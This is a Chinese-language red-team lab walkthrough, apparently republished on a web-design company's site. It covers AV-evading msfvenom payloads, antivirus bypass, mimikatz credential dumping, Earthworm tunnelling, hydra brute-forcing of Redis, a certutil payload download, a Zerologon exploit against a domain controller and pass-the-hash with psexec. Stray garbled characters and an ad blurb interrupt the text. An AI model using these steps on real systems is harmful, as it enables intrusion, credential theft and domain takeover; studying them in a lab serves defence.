新聞中心
安全攻防實(shí)戰(zhàn)系列MSF
前言
創(chuàng)新互聯(lián)網(wǎng)站建設(shè)服務(wù)商,為中小企業(yè)提供做網(wǎng)站、網(wǎng)站制作服務(wù),網(wǎng)站設(shè)計(jì),網(wǎng)站托管維護(hù)等一站式綜合服務(wù)型公司,專業(yè)打造企業(yè)形象網(wǎng)站,讓您在眾多競(jìng)爭(zhēng)對(duì)手中脫穎而出創(chuàng)新互聯(lián)。
在紅隊(duì)攻防中,我們主要在外網(wǎng)進(jìn)行信息收集,通過(guò)cms或者其他春饑漏洞拿到shell,之后通過(guò)免殺木馬將windows或linux服務(wù)器上線到cobalt strike或msf等c2服務(wù)器,之后對(duì)內(nèi)網(wǎng)進(jìn)行信息收集并繪制網(wǎng)絡(luò)拓?fù)鋱D,進(jìn)行工作組或域滲透,拿到各個(gè)網(wǎng)段機(jī)器的權(quán)限,遠(yuǎn)程登陸并截圖證明。
環(huán)境配置
從虛擬機(jī)網(wǎng)絡(luò)來(lái)看
機(jī)器描述
目錄如下
蟻劍拿shell
msf免殺拿shell
使用msfvenom生成免殺木馬payload,里面的IP和端口自行修改,就是反彈shell的kali
使用分離免殺工具生成loader.exe文件
對(duì)生成的exe文件進(jìn)行加殼免殺
免殺效果如下
免殺之后通過(guò)蟻劍上傳到server-bt上
msf開(kāi)啟監(jiān)聽(tīng)
蟻劍運(yùn)行
getuid
ps
msf內(nèi)網(wǎng)滲透
load mimikatz # 加載Mimikatz模塊
成功開(kāi)啟了遠(yuǎn)程桌面,并且生成了一個(gè)txt文件,這個(gè)txt文件往后可用中森胡來(lái)關(guān)閉遠(yuǎn)程桌面,關(guān)閉命令
run multi_console_command -r /root/.msf4/loot/xx_default_192.168.1.5_host.windows.cle_xxx5.txt
繞過(guò)火絨添加用戶
螞蟻劍或者cs上傳添加用戶.exe
遠(yuǎn)程登錄server-bt
然后再添加一個(gè)由system權(quán)限下開(kāi)啟的桌面進(jìn)程
Earthworm穿透
上傳EW(Earthworm)到C:/wwwroot/
kali環(huán)境進(jìn)行爆破
proxychains hydra -P /usr/xxx/password.lst 192.168.59.4 redis 6379
利用過(guò)程
代理蟻劍進(jìn)賣攔行連接這個(gè)shell
并查看權(quán)限
Earthworm穿透
掛代理,通過(guò)之前上傳的EW(Earthworm)
服務(wù)器端執(zhí)行以下命令(關(guān)掉server-bt的防火墻代理才能生效)
execute C:\wwwroot\ew.exe -s ssocksd -l 1090
用msfvenom生成一個(gè)正向馬傳進(jìn)去(因?yàn)闊o(wú)法訪問(wèn)外網(wǎng),反向出不來(lái)),msf正向連接。
使用分離免殺工具生成loader.exe文件
免殺效果如下
C:\ProgramData\xxxx.exe -i -c "certutil -urlcache -split -f msf1.exe
成功獲取服務(wù)器的shell,之后就是各種權(quán)限維持了。創(chuàng)建計(jì)劃任務(wù)、開(kāi)機(jī)自啟等等都能夠?qū)崿F(xiàn)。
ps
添加賬戶和遠(yuǎn)程連接同第一層
load mimikatz # 加載Mimikatz模塊
這里已經(jīng)滿足觸發(fā)zerologon的兩個(gè)條件,能ping通域控制器,知道域控計(jì)算機(jī)名,當(dāng)然最后dump出域內(nèi)所有hash的時(shí)候需要域名
置空域控機(jī)器用戶NTLM hash
proxychains python3 cve-2020-1472-exploit.py 12server-dc$ 10.10.10.201
接下來(lái)用置空的機(jī)器賬戶dump所有hash
(890c這個(gè)hash就是"空"的NTML hash)
我們的目標(biāo)是獲得域內(nèi)administrator的hash,然后就可以hash傳遞,登陸任意域內(nèi)機(jī)器
利用 psexec(PTH)上線server-dc到 MSF:
成功獲取到shell
利用 psexec 上線server-ex13到 MSF:
網(wǎng)站欄目:服務(wù)器攻防安全技巧 服務(wù)器攻防要學(xué)什么
URL標(biāo)題:http://fisionsoft.com.cn/article/dspgihe.html